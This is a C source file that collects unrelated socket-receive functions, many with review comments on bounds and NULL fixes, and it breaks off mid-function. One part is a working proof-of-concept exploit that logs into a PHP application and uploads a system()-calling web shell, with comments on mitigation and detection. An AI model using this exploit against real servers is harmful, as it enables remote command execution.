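/**
 * Read the three-character status code from the start of an HTTP response.
 *
 * Nothing is read when socket_select() returns 0 for the given timeout.
 * Otherwise the first 24 bytes of the response are read, and the three bytes
 * at offset 9 (the position of the code in a "HTTP/1.x NNN ..." status line)
 * are copied out. The rest of the response is then drained in 24-byte reads
 * until a read comes back short.
 *
 * @param socket   socket to read from
 * @param timeout  timeout handed to socket_select()
 * @return heap-allocated, NUL-terminated 3-character string that the caller
 *         must free(), or NULL when no data was available, the first read was
 *         short, or memory could not be allocated.
 *
 * NOTE(review): the three bytes come from the peer unvalidated. Nothing here
 * checks that the response starts with "HTTP/" or that the bytes are digits,
 * so callers should validate the string before converting or trusting it.
 */
char *http_get_status_code( int socket, int timeout ) {
    enum { CHUNK_LENGTH = 24, STATUS_OFFSET = 9, STATUS_LENGTH = 3 };
    char *result = NULL;
    char *buffer;

    if( socket_select( socket, timeout ) == 0 ) {
        return NULL;
    }

    buffer = malloc( CHUNK_LENGTH );
    if( buffer == NULL ) {
        /* Previously an allocation failure led to a write through NULL. */
        return NULL;
    }

    if( socket_receive( socket, buffer, CHUNK_LENGTH ) != CHUNK_LENGTH ) {
        free( buffer );
        return NULL;
    }

    result = malloc( STATUS_LENGTH + 1 );
    if( result != NULL ) {
        memcpy( result, buffer + STATUS_OFFSET, STATUS_LENGTH );
        result[STATUS_LENGTH] = '\0';
    }

    /* Drain whatever is left of the response, even if result is NULL, so the
     * socket ends up in the same state as before this change. */
    while( socket_receive( socket, buffer, CHUNK_LENGTH ) == CHUNK_LENGTH ) {
    }

    free( buffer );
    return result;
}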
/*
** Pull up to N bytes of content straight off the wire into zBuf and
** return the number of bytes obtained.
**
** The source depends on the transport in use: the ssh pipe, SSL (only
** when compiled with FOSSIL_ENABLE_SSL, otherwise nothing is read), a
** local file, or a plain socket. zBuf must have room for N bytes; this
** routine never writes a terminator.
*/
static int transport_fetch(char *zBuf, int N){
  int nGot;
  if( sshIn ){
    /* read() may return short counts, so keep going until N bytes have
    ** arrived or read() reports end-of-file or an error. */
    int nLeft = N;
    nGot = 0;
    while( nLeft>0 ){
      int n = read(sshIn, &zBuf[nGot], nLeft);
      if( n<=0 ) break;
      nGot += n;
      nLeft -= n;
    }
  }else if( g.urlIsHttps ){
#ifdef FOSSIL_ENABLE_SSL
    nGot = ssl_receive(0, zBuf, N);
#else
    nGot = 0;
#endif
  }else if( g.urlIsFile ){
    nGot = fread(zBuf, 1, N, transport.pFile);
  }else{
    nGot = socket_receive(0, zBuf, N);
  }
  return nGot;
}
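/*
 * Check enough diskspace.
 * return 0=No, 1=Yes, 2=Unknown, 3=Error
 *
 * Sends "DSPC:1,<needed>;" to the server and parses the reply, which is
 * expected to look like "<code>:<cnt>,<rc>[,<avail>];". The reply is data
 * from another process, so every field is checked before it is converted.
 * A missing field, or an allocation failure, leaves the result at 3 (Error)
 * instead of passing NULL to atoi().
 */
int enoughspace(unsigned int needed)
{
    char            *buf, *field, *availfield;
    int             rc = 3, cnt;
    unsigned int    avail = 0;

    buf = calloc(SS_BUFSIZE, sizeof(char));
    if (buf == NULL)
        return rc;

    /* needed is unsigned, so print it with %u rather than %d. */
    snprintf(buf, SS_BUFSIZE, "DSPC:1,%u;", needed);

    if (socket_send(buf) == 0) {
        snprintf(buf, SS_BUFSIZE, "%s", socket_receive());
        strtok(buf, ":");
        field = strtok(NULL, ",");
        cnt = (field != NULL) ? atoi(field) : 0;

        if (cnt == 1) {
            field = strtok(NULL, ";");
            if (field != NULL)
                rc = atoi(field);
            else
                Syslog('-', "Error in enoughspace()");
        } else if (cnt == 2) {
            field = strtok(NULL, ",");
            availfield = strtok(NULL, ";");
            if ((field != NULL) && (availfield != NULL)) {
                rc = atoi(field);
                avail = (unsigned int)atol(availfield);
                if (rc == 0)
                    /* Both values are unsigned int; %ld did not match them. */
                    Syslog('+', "Only %u MBytes diskspace, need %u MBytes", avail, needed);
            } else {
                Syslog('-', "Error in enoughspace()");
            }
        } else {
            Syslog('-', "Error in enoughspace()");
        }
    }

    free(buf);
    return rc;
}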
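/**
 * Accept one client, read a single request from it and hand it to a handler.
 *
 * Up to 1024 bytes are received, the client connection is closed, and the
 * data is passed to `handler`, or to socket_default_client_handler() when
 * `handler` is NULL.
 *
 * The buffer is one byte larger than the receive size and zero-filled, so
 * the handler always gets a NUL-terminated string, even if the peer sends
 * exactly 1024 bytes with no terminator.
 *
 * @return true when accept, allocation, receive or close fails (the handler
 *         is not called); otherwise whatever the handler returns.
 */
bool socket_server_serve (socket_t *server, socket_t *client, socket_client_handler_t handler)
{
    enum { REQUEST_SIZE = 1024 };
    char *buffer;
    bool handled;

    if (!socket_accept (server, client)) {
        return true;
    }

    buffer = calloc (REQUEST_SIZE + 1, sizeof (char));
    if (buffer == NULL) {
        /* Do not leave the accepted client open when we cannot serve it. */
        (void) socket_close (client);
        return true;
    }

    if (!socket_receive (client, buffer, REQUEST_SIZE)) {
        (void) socket_close (client);
        free (buffer);
        return true;
    }

    if (!socket_close (client)) {
        free (buffer);
        return true;
    }

    handled = handler ? handler (buffer) : socket_default_client_handler (buffer);

    free (buffer);
    return handled;
}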
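/*
 * Ask the socket for more data when the receive ring buffer has room.
 *
 * Data is written at rx->head. The contiguous free region therefore runs
 * from head to the end of the buffer when head is past tail, and from head
 * up to tail otherwise.
 *
 * The first case used to be computed as SERIAL_BUFFER_SIZE - rx->tail. That
 * is larger than the room left after head, so the receive could write past
 * the end of rx->buffer.
 *
 * NOTE(review): the return value of socket_receive() is ignored and head is
 * not advanced here; presumably that happens elsewhere, so confirm. With
 * head == tail the computed space is 0 and nothing is requested.
 */
void fillFromSocketIfNeeded() {
  int space;

  if (rx->head > rx->tail) {
    // head after tail, so can fill up to end of buffer
    space = SERIAL_BUFFER_SIZE - rx->head;
  } else {
    space = rx->tail - rx->head; // may be 0
  }

  if (socket != SOCKET_INVALID && space > 0) {
    socket_receive(socket, rx->buffer + rx->head, space, 0);
  }
}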
/*
 * Query the server status with "SBBS:0;" and return TRUE when the reply
 * starts with "100:2,2", FALSE otherwise, including when the request
 * could not be sent.
 *
 * The reply is copied with a bound of 80 bytes into a static 81-byte
 * buffer, so the last byte is never written and stays NUL.
 */
int IsZMH()
{
    static char reply[81];
    int         matched = FALSE;

    snprintf(reply, sizeof(reply), "SBBS:0;");

    if (socket_send(reply) != 0)
        return FALSE;

    strncpy(reply, socket_receive(), sizeof(reply) - 1);
    if (strncmp(reply, "100:2,2", 7) == 0)
        matched = TRUE;

    return matched;
}
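/*
 * Format a command (printf style) and send it to the server. When the send
 * succeeds the reply is read and discarded.
 *
 * The command is truncated to SS_BUFSIZE - 1 characters. If the work buffer
 * cannot be allocated nothing is sent; the previous code formatted into a
 * NULL pointer in that case.
 */
void SockS(const char *format, ...)
{
    char    *out;
    va_list va_ptr;

    out = calloc(SS_BUFSIZE, sizeof(char));
    if (out == NULL)
        return;

    va_start(va_ptr, format);
    vsnprintf(out, SS_BUFSIZE, format, va_ptr);
    va_end(va_ptr);

    if (socket_send(out) == 0)
        socket_receive();

    free(out);
}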
/*
 * Receive callback for a socat connection.
 *
 * Bytes are appended to socat->notification until a full CronNotification
 * has arrived. The receive length is limited to the space still missing, so
 * a peer cannot write past the structure. A complete notification is passed
 * to cron_handle_notification() and the socat is then marked disconnected.
 * A peer close, or any receive error that is neither an interruption nor
 * would-block, marks the socat disconnected as well.
 */
static void socat_handle_receive(void *opaque) {
	Socat *socat = opaque;
	uint8_t *write_position = (uint8_t *)&socat->notification + socat->notification_used;
	int received;

	received = socket_receive(socat->socket, write_position,
	                          sizeof(CronNotification) - socat->notification_used);

	if (received < 0) {
		if (errno_interrupted()) {
			log_debug("Receiving from socat (handle: %d) was interrupted, retrying",
			          socat->socket->handle);
		} else if (errno_would_block()) {
			log_debug("Receiving from socat (handle: %d) Daemon would block, retrying",
			          socat->socket->handle);
		} else {
			log_error("Could not receive from socat (handle: %d), disconnecting socat: %s (%d)",
			          socat->socket->handle, get_errno_name(errno), errno);

			socat->disconnected = true;
		}

		return;
	}

	if (received == 0) {
		log_debug("Socat (handle: %d) disconnected by peer",
		          socat->socket->handle);

		socat->disconnected = true;

		return;
	}

	socat->notification_used += received;

	if (socat->notification_used >= (int)sizeof(CronNotification)) {
		cron_handle_notification(&socat->notification);

		log_debug("Socat (handle: %d) received complete request, disconnecting socat",
		          socat->socket->handle);

		socat->disconnected = true;
	}

	// otherwise: wait for complete request
}
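/*
 * Ask the server for the next sequence number ("SSEQ:0;") and return it.
 *
 * The reply is expected to be "<code>:<cnt>,<sequence>;". Returns 0 when the
 * request cannot be sent, memory cannot be allocated, or the reply does not
 * contain the sequence field.
 *
 * Changes from the previous version: the request buffer is now freed on
 * every path (it leaked when socket_send() failed), and the reply is checked
 * before atol() so a short reply no longer dereferences NULL.
 *
 * The buffer returned by socket_receive() is not freed here, as before.
 */
unsigned int sequencer()
{
    char            *buf, *reply, *res;
    unsigned int    seq = 0;

    buf = calloc(SS_BUFSIZE, sizeof(char));
    if (buf == NULL)
        return seq;

    snprintf(buf, SS_BUFSIZE, "SSEQ:0;");

    if (socket_send(buf) == 0) {
        reply = socket_receive();
        if (reply != NULL) {
            strtok(reply, ",");
            res = strtok(NULL, ";");
            if (res != NULL)
                seq = (unsigned int)atol(res);
        }
    }

    free(buf);
    return seq;
}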
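/*
 * Format a command (printf style), send it to the server and return the
 * reply.
 *
 * The reply is copied, truncated to SS_BUFSIZE - 1 characters, into a static
 * buffer. The returned pointer is therefore overwritten by the next call and
 * must not be freed. An empty string is returned when the command cannot be
 * sent or the work buffer cannot be allocated; the previous code formatted
 * into a NULL pointer on allocation failure.
 */
char *SockR(const char *format, ...)
{
    static char buf[SS_BUFSIZE];
    char        *out;
    va_list     va_ptr;

    memset(&buf, 0, SS_BUFSIZE);

    out = calloc(SS_BUFSIZE, sizeof(char));
    if (out == NULL)
        return buf;

    va_start(va_ptr, format);
    vsnprintf(out, SS_BUFSIZE, format, va_ptr);
    va_end(va_ptr);

    if (socket_send(out) == 0)
        snprintf(buf, SS_BUFSIZE, "%s", socket_receive());

    free(out);
    return buf;
}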
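/*
 * Check BBS open status, return FALSE if the bbs is closed.
 * Display the reason why to the user.
 *
 * The server reply to "SBBS:0;" is copied with a bound of 80 bytes into a
 * static 81-byte buffer. strncpy() zero-pads the copy, so the text at
 * offset 8 is always terminated, even for a reply shorter than 8 bytes.
 *
 * An empty reply used to make buf[strlen(buf) - 1] write one byte before
 * the buffer; the last character is now only removed when there is one.
 */
int CheckStatus()
{
    static char buf[81], msg[81];
    size_t      len;

    snprintf(buf, 81, "SBBS:0;");
    if (socket_send(buf) == 0) {
        strncpy(buf, socket_receive(), 80);
        if (strncmp(buf, "100:2,0", 7) == 0)
            return TRUE;
        if ((strncmp(buf, "100:2,2", 7) == 0) && (!ttyinfo.honor_zmh))
            return TRUE;

        /* Strip the trailing character of the reply, if any. */
        len = strlen(buf);
        if (len > 0)
            buf[len - 1] = '\0';

        Enter(2);
        PUTCHAR('\007');
        snprintf(msg, 81, "*** %s ***", cldecode(buf+8));
        PUTSTR(msg);
        Syslog('+', "Send user message \"%s\"", cldecode(buf+8));
        Enter(3);
    }
    return FALSE;
}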
/*
 * Proof-of-concept client for an authenticated file-upload weakness in a PHP
 * web application (the application is not named in this listing).
 *
 * What the visible code does:
 *   1. POSTs the supplied credentials to <path>index.php and requires the
 *      text "Login Successful" in the response.
 *   2. Takes the PHPSESSID cookie from that response.
 *   3. POSTs a multipart form to <path>documents.php whose "doc" part is a
 *      file named shell.php, declared as text/plain, with PHP content that
 *      passes a request parameter to system().
 *   4. Requires "Uploaded Successfully" and prints the URL of the stored
 *      file under <path>gallery/documents/.
 *
 * Defensive reading: the upload works only if the server keeps the
 * client-supplied file name and extension and stores the file in a directory
 * served by the PHP interpreter. Mitigations are an allow-list of extensions
 * applied server-side, server-generated file names, storage outside the
 * document root (or with script execution disabled for the upload
 * directory), and not trusting the part's Content-Type. For detection, look
 * for multipart uploads whose filename ends in a script extension and for
 * later requests to the upload directory that carry a query string.
 *
 * Arguments: argv[1] host, argv[2] path, argv[3] user, argv[4] password.
 * Returns 0 when the upload was acknowledged, -1 on any failure.
 */
int main(int argc, char *argv[]) {

    int sd;
    /* Multipart body: the file part plus the "desc" and "submitadd" fields. */
    char code[] = "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
                  "Content-Type: text/plain\r\n"
                  "\r\n"
                  "<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"desc\"\r\n"
                  "\r\n"
                  "description\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"submitadd\"\r\n"
                  "\r\n"
                  "Submit\r\n"
                  "--AaB03x--\r\n",
         *buffer = NULL,
         *rec = NULL,
         *session = NULL;

    if(argc < 5) {
        usage(argv[0]);
        return -1;
    }

    /* One request buffer, sized from the arguments, is reused for both requests. */
    if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) {
        perror("calloc");
        return -1;
    }

    /* Step 1: login request. */
    sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
                    "Host: %s\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n"
                    "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]);

    printf("\n[*] Connecting...");

    if((sd = socket_connect(argv[1], 80)) < 0) {
        printf("[-] Connection failed!\n\n");
        free(buffer);
        return -1;
    }

    printf("\n[+] Connected"
           "\n[*] Send login...");

    if(socket_send(sd, buffer, strlen(buffer)) < 0) {
        printf("[-] Sending failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    if(!(rec = socket_receive(sd, 0))) {
        printf("[-] Receive failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    /* The login is judged only by this marker text in the response. */
    if(!strstr(rec, "Login Successful")) {
        printf("\n[-] Login Incorrect!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    /* Step 2: reuse the session cookie issued by the login response. */
    session = strstr(rec, "PHPSESSID");
    session = strtok(session, ";");

    if((sd = socket_connect(argv[1], 80)) < 0) {
        printf("[-] Connection failed!\n\n");
        free(buffer);
        return -1;
    }

    printf("\n[+] Login Successful"
           "\n[+] Uploading...");

    /* Step 3: the upload request, authenticated by the cookie. */
    sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n"
                    "Host: %s\r\n"
                    "Cookie: %s\r\n"
                    "Content-type: multipart/form-data, boundary=AaB03x\r\n"
                    "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code);

    if(socket_send(sd, buffer, strlen(buffer)) < 0) {
        printf("[-] Sending failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    if(!(rec = socket_receive(sd, 0))) {
        printf("[-] Receive failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    /* Step 4: success is judged by the application's own confirmation text. */
    if(!strstr(rec, "Uploaded Successfully")) {
        printf("\n[-] Upload failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    free(buffer);
    close(sd);

    printf("\n[+] Shell uploaded"
           "\n[+] Connection closed\n\n"
           "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]);

    return 0;

}
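/*
 * Main menu loop of the BBS session.
 *
 * Each pass opens the menu file for the current menu level (the user's
 * language first, then the default language), displays the entries the user
 * may see, runs the autoexec entries, performs the status, semaphore, chat
 * and time checks, reads one input and executes the matching entry.
 *
 * The reply to the "CISC" query is data from another process. It is now
 * copied into buf with a bound; it was an unbounded strcpy() into an
 * 81-byte stack buffer.
 *
 * NOTE(review): the two calloc() results are not checked. Menu type 13
 * frees Input and sMenuPathFileName and closes the file before DoMenu() is
 * called, which is only safe if DoMenu() does not return for that type.
 * Confirm.
 */
void menu()
{
    FILE    *pMenuFile;
    int     Key, IsANSI;
    char    temp[81], *Input, *sMenuPathFileName, buf[81];

    Input = calloc(PATH_MAX, sizeof(char));
    sMenuPathFileName = calloc(PATH_MAX, sizeof(char));
    Syslog('+', "Starting menu loop");

    /*
     * Loop forever, this is what a BBS should do until a user logs out.
     */
    while (TRUE) {

        WhosDoingWhat(BROWSING, NULL);

        /*
         * Open menufile, first users language menu, if it fails
         * try to open the default menu.
         */
        snprintf(sMenuPathFileName, PATH_MAX, "%s/share/int/menus/%s/%s", getenv("FTND_ROOT"), lang.lc, Menus[MenuLevel]);
        if ((pMenuFile = fopen(sMenuPathFileName, "r")) == NULL) {
            snprintf(sMenuPathFileName, PATH_MAX, "%s/share/int/menus/%s/%s", getenv("FTND_ROOT"), CFG.deflang, Menus[MenuLevel]);
            pMenuFile = fopen(sMenuPathFileName,"r");
            if (pMenuFile != NULL)
                Syslog('b', "Menu %s (Default)", Menus[MenuLevel]);
        } else {
            Syslog('b', "Menu %s (%s)", Menus[MenuLevel], lang.Name);
        }

        if (pMenuFile == NULL) {
            clear();
            WriteError("Can't open menu file: %s", sMenuPathFileName);
            MenuError++;

            /*
             * Is this the last attempt to open the default menu?
             */
            if (MenuError == 10) {
                WriteError("FATAL ERROR: Too many menu errors");
                snprintf(temp, 81, "Too many menu errors, notifying Sysop\r\n\r\n");
                PUTSTR(temp);
                sleep(3);
                die(FTNERR_CONFIG_ERROR);
            }

            /*
             * Switch back to the default menu
             */
            MenuLevel = 0;
            strcpy(Menus[0], CFG.default_menu);
        } else {
            /*
             * Display Menu Text Fields and Perform all autoexec menus in order of menu file.
             * First check if there are any ANSI menus, if not, send a clearscreen first.
             */
            IsANSI = FALSE;
            while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) {
                if ( Le_Access(exitinfo.Security, menus.MenuSecurity) && (UserAge >= le_int(menus.Age))){
                    if ((le_int(menus.MenuType) == 5) || (le_int(menus.MenuType) == 19) || (le_int(menus.MenuType) == 20))
                        IsANSI = TRUE;
                }
            }
            fseek(pMenuFile, 0, SEEK_SET);
            if (! IsANSI)
                clear();

            while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) {
                if ( Le_Access(exitinfo.Security, menus.MenuSecurity) && (UserAge >= le_int(menus.Age))){
                    if (menus.AutoExec) {
                        DoMenu( le_int(menus.MenuType) );
                    }
                    DisplayMenu( );
                }
            }

            /*
             * Check if the BBS closed down for Zone Mail Hour or
             * system shutdown. If so, we run the Goodbye show.
             */
            if (CheckStatus() == FALSE) {
                fclose(pMenuFile);
                Syslog('+', "Kicking user out, the BBS is closed.");
                sleep(3);
                Good_Bye(FTNERR_OK);
            }

            /*
             * Check the upsdown semafore
             */
            if (IsSema((char *)"upsdown")) {
                fclose(pMenuFile);
                Syslog('+', "Kicking user out, upsdown semafore detected");
                snprintf(temp, 81, "System power failure, closing the bbs");
                PUTSTR(temp);
                Enter(2);
                sleep(3);
                Good_Bye(FTNERR_OK);
            }

            /*
             * Check if SysOp wants to chat to user everytime user gets prompt.
             */
            if (CFG.iChatPromptChk) {
                snprintf(buf, 81, "CISC:1,%d", mypid);
                if (socket_send(buf) == 0) {
                    /* Bounded copy: the reply length is not under our control. */
                    snprintf(buf, sizeof(buf), "%s", socket_receive());
                    if (strcmp(buf, "100:1,1;") == 0) {
                        Syslog('+', "Forced sysop/user chat");
                        Chat(exitinfo.Name, (char *)"#sysop");
                        continue;
                    }
                }
            }

            /*
             * Check users timeleft
             */
            TimeCheck();
            alarm_on();

            if (exitinfo.HotKeys) {
                Key = Readkey();
                snprintf(Input, 81, "%c", Key);
                Enter(1);
            } else {
                colour(CFG.InputColourF, CFG.InputColourB);
                GetstrC(Input, 80);
            }

            if ((strcmp(Input, "")) != 0) {

                fseek(pMenuFile, 0, SEEK_SET);

                while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) {

                    if ((strcmp(tu(Input), menus.MenuKey)) == 0) {
                        if ((Le_Access(exitinfo.Security, menus.MenuSecurity)) && (UserAge >= le_int(menus.Age))) {
                            Syslog('+', "Menu[%d] %d=(%s), Opt: '%s'", MenuLevel, le_int(menus.MenuType), menus.TypeDesc, menus.OptionalData);
                            if (le_int(menus.MenuType) == 13) {
                                /*
                                 *  Terminate call, cleanup here
                                 */
                                free(Input);
                                free(sMenuPathFileName);
                                fclose(pMenuFile);
                            }
                            DoMenu(le_int(menus.MenuType));
                            break;
                        }
                    }
                }
            }
            fclose(pMenuFile);

        } /* If menu open */
    } /* while true */
}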
/** Receive a packet through the given socket.
 *
 * Reads up to SIZE_BUFFER bytes from the socket into a freshly allocated
 * buffer and returns whatever packet_request() builds from that buffer.
 * The value returned by socket_receive() is stored in packet_rcv_bytes,
 * not returned.
 *
 * NOTE(review): the buffer is handed to packet_request() without a
 * terminator being added, and this function does not free it. Confirm that
 * packet_request() uses packet_rcv_bytes for the length and takes
 * ownership of the buffer.
 */
lpacket*packet_receive(lsocket*sck){
	char *raw = malloc(SIZE_BUFFER * sizeof(char));

	if (raw == NULL) ERROR("lPacket malloc");

	packet_rcv_bytes = socket_receive(sck, raw, SIZE_BUFFER);

	return packet_request(raw);
}
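/** [Deprecated] Receive a message with less information to provide,
 * note that it is advised to use a packet instead.
 *
 * Reads up to SIZE_BUFFER bytes into a new heap buffer and returns it; the
 * caller owns the buffer and must free() it. The buffer is zero-filled and
 * one byte larger than the receive size, so the result is always
 * NUL-terminated, even when the peer sends exactly SIZE_BUFFER bytes.
 *
 * Returns NULL when the buffer cannot be allocated. The previous code
 * passed the NULL pointer on to socket_receive().
 */
char *socket_message_receive(lsocket*sck){
	char *message = calloc(SIZE_BUFFER + 1, sizeof(char));

	if (message == NULL)
		return NULL;

	socket_receive(sck, message, SIZE_BUFFER);
	return message;
}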
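/*
 * Log a unix-mode user into the BBS.
 *
 * Looks up sUnixName in users.data, splits the user name, counts
 * simultaneous logins via the server, applies expiry and daily limits,
 * writes the updated user record back, shows the welcome screens, and
 * finally enters menu().
 *
 * Hardening compared with the previous version, with no change on
 * well-formed data:
 *   - server replies are copied into buf with a bound; they were copied
 *     with an unbounded strcpy() into a 128-byte stack buffer;
 *   - strtok() results are checked before use in the name split and in the
 *     login count, so a short record or reply no longer dereferences NULL;
 *   - UserName is explicitly terminated after strncpy();
 *   - the copy of CFG.sysop_name into temp1 is bounded.
 *
 * NOTE(review): the records are read with usrconfighdr.recsize taken from
 * the file header and are not checked against sizeof(usrconfig), and the
 * header fread() result is ignored. A damaged users.data could therefore
 * overrun usrconfig. The login-count loop also never ends if socket_send()
 * keeps failing. Both are left as they were.
 */
void user(void)
{
    FILE        *pUsrConfig, *pLimits;
    int         i, x, FoundName = FALSE, iFoundLimit = FALSE, IsNew = FALSE, logins = 0, Start;
    int         l1, l2;
    char        *token, temp[PATH_MAX], temp1[84], UserName[37], buf[128], *fullname;
    time_t      LastLogin;
    struct stat st;

    grecno = 0;
    Syslog('+', "Unixmode login: %s", sUnixName);

    snprintf(temp, PATH_MAX, "%s/etc/users.data", getenv("FTND_ROOT"));
    if ((pUsrConfig = fopen(temp,"r+")) == NULL) {
        /*
         * This should not happen.
         */
        WriteError("$Can't open %s", temp);
        PUTSTR((char *)"Can't open userfile, run \"newuser\" first");
        Enter(1);
        ExitClient(FTNERR_OK);
    }

    fread(&usrconfighdr, sizeof(usrconfighdr), 1, pUsrConfig);
    while (fread(&usrconfig, usrconfighdr.recsize, 1, pUsrConfig) == 1) {
        if (strcmp(usrconfig.Name, sUnixName) == 0) {
            FoundName = TRUE;
            break;
        } else
            grecno++;
    }

    if (!FoundName) {
        fclose(pUsrConfig);
        snprintf(temp, PATH_MAX, "Unknown username: %s\r\n", sUnixName);
        PUTSTR(temp);
        /* FATAL ERROR: You are not in the BBS users file.*/
        snprintf(temp, PATH_MAX, "%s\r\n", (char *) Language(389));
        PUTSTR(temp);
        /* Please run 'newuser' to create an account */
        snprintf(temp, PATH_MAX, "%s\r\n", (char *) Language(390));
        PUTSTR(temp);
        Syslog('?', "FATAL: Could not find user in BBS users file.");
        Syslog('?', "       and system is using unix accounts\n");
        Free_Language();
        ExitClient(FTNERR_OK);
    }

    /*
     * Copy username, split first and lastname.
     */
    strncpy(UserName, usrconfig.sUserName, sizeof(UserName)-1);
    UserName[sizeof(UserName)-1] = '\0';    /* strncpy does not terminate a full-length copy */
    if ((strchr(UserName,' ') == NULL) && !CFG.iOneName) {
        /*
         * NOTE(review): this branch is taken when the name has NO space,
         * so the second strtok() normally yields NULL. The condition is
         * kept as it was; only the NULL results are guarded.
         */
        token = strtok(UserName, " ");
        if (token != NULL)
            strncpy(FirstName, token, sizeof(FirstName)-1);
        token = strtok(NULL, "\0");
        if (token != NULL) {
            i = strlen(token);
            for (x = 2; x < i; x++) {
                if (token[x] == ' ')
                    token[x] = '\0';
            }
            strncpy(LastName, token, sizeof(LastName)-1);
        }
    } else
        strncpy(FirstName, UserName, sizeof(FirstName)-1);
    strncpy(UserName, usrconfig.sUserName, sizeof(UserName)-1);
    UserName[sizeof(UserName)-1] = '\0';
    Syslog('+', "%s On-Line from \"%s\", node %d", UserName, ttyinfo.comment, iNode);
    IsDoing("Just Logged In");

    /*
     * Check some essential files, create them if they don't exist.
     */
    ChkFiles();

    /*
     * Setup users favourite language.
     */
    utf8 = (usrconfig.Charset == FTNC_UTF8);
    Set_Language(usrconfig.iLanguage);
    Free_Language();
    InitLanguage();

    /*
     * User logged in, tell it to the server. Check if a location is
     * set, if Ask User location for new users is off, this field is
     * empty but we have to send something to the server.
     */
    if (strlen(usrconfig.sLocation))
        UserCity(mypid, usrconfig.Name, usrconfig.sLocation);
    else
        UserCity(mypid, usrconfig.Name, (char *)"N/A");

    /*
     * Count simultaneous logins
     */
    Start = TRUE;
    while (TRUE) {
        if (Start)
            snprintf(buf, 128, "GMON:1,1;");
        else
            snprintf(buf, 128, "GMON:1,0;");
        Start = FALSE;
        if (socket_send(buf) == 0) {
            /* Bounded copy: the reply length is not under our control. */
            snprintf(buf, sizeof(buf), "%s", socket_receive());
            if (strncmp(buf, "100:0;", 6) == 0)
                break;  /* No more data */
            if (strstr(buf, "ftnbbs")) {
                /*
                 * Only ftnbbs is wanted
                 */
                strtok(buf, ",");                   /* response */
                strtok(NULL, ",");                  /* pid      */
                strtok(NULL, ",");                  /* tty      */
                token = strtok(NULL, ",");          /* username */
                if (token != NULL) {
                    fullname = xstrcpy(cldecode(token));
                    if ((fullname != NULL) && (strcmp(fullname, usrconfig.Name) == 0)) {
                        logins++;
                    }
                    free(fullname);
                }
            }
        }
    }
    if (CFG.max_logins && (logins > CFG.max_logins)) {
        Syslog('+', "User logins %d, allowed %d, disconnecting", logins, CFG.max_logins);
        colour(LIGHTRED, BLACK);
        snprintf(temp, PATH_MAX, "%s %d %s\r\n", (char *) Language(18), CFG.max_logins, (char *) Language(19));
        PUTSTR(temp);
        Quick_Bye(FTNERR_INIT_ERROR);
    }

    /*
     * Set last file and message area so these numbers are saved when
     * the user hangs up or is logged off before het gets to the main
     * menu. Later in this function the areas are set permanent.
     */
    iAreaNumber = usrconfig.iLastFileArea;
    iMsgAreaNumber = usrconfig.iLastMsgArea;

    /*
     * See if this user is the Sysop.
     */
    strcpy(temp, UserName);
    snprintf(temp1, sizeof(temp1), "%s", CFG.sysop_name);
    if ((strcasecmp(CFG.sysop_name, UserName)) == 0) {
        /*
         * If login name is sysop, set SYSOP true
         */
        SYSOP = TRUE;
        Syslog('+', "Sysop is online");
    }

    /*
     * Is this a new user?
     */
    if (usrconfig.iTotalCalls == 0)
        IsNew = TRUE;

    /*
     * Pause after logo screen.
     */
    alarm_on();
    Pause();

    if (usrconfig.Archiver[0] == '\0') {
        usrconfig.Archiver[0] = 'Z';
        usrconfig.Archiver[1] = 'I';
        usrconfig.Archiver[2] = 'P';
        Syslog('+', "Setup default archiver ZIP");
    }

    /*
     * Check users date format. We do it strict as we
     * need this to be good for several other purposes.
     * If it is correct, the users age is set in UserAge
     */
    if (!Test_DOB(usrconfig.sDateOfBirth)) {
        Syslog('!', "Error in Date of Birth");
        Chg_DOB();
        strcpy(usrconfig.sDateOfBirth, exitinfo.sDateOfBirth);
    }

    /*
     * Check to see if user must expire
     */
    snprintf(temp,PATH_MAX, "%s", (char *) GetDateDMY());
    SwapDate(temp, usrconfig.sExpiryDate);

    /* Convert Date1 & Date2 to longs for compare */
    l1 = atol(Date1);
    l2 = atol(Date2);

    if (l1 >= l2 && l2 != 0) {
        /*
         * If Expiry Date is the same as today expire to
         * Expire Sec level
         */
        usrconfig.Security = usrconfig.ExpirySec;
        Syslog('!', "User is expired, resetting level");
        /*
         * Show texfile to user telling him about this.
         */
        DisplayFile((char *)"expired");
    }

    free(Date1);
    free(Date2);

    /*
     * Copy limits.data into memory
     */
    snprintf(temp, PATH_MAX, "%s/etc/limits.data", getenv("FTND_ROOT"));
    if ((pLimits = fopen(temp,"rb")) == NULL) {
        WriteError("$Can't open %s", temp);
    } else {
        fread(&LIMIThdr, sizeof(LIMIThdr), 1, pLimits);

        while (fread(&LIMIT, sizeof(LIMIT), 1, pLimits) == 1) {
            if (LIMIT.Security == usrconfig.Security.level) {
                iFoundLimit = TRUE;
                break;
            }
        }
        fclose(pLimits);
    }

    if (!iFoundLimit) {
        WriteError("Unknown Security Level in limits.data");
        usrconfig.iTimeLeft = 0; /* Could not find limit, so set to Zero */
        usrconfig.iTimeUsed = 0; /* Set to Zero as well  */
    } else {
        /*
         * Give user new time limit everyday, also new users get a new limit.
         */
        snprintf(temp,PATH_MAX, "%s", (char *) GetDateDMY());
        if (((strcmp(StrDateDMY(usrconfig.tLastLoginDate), temp)) != 0) || IsNew) {
            /*
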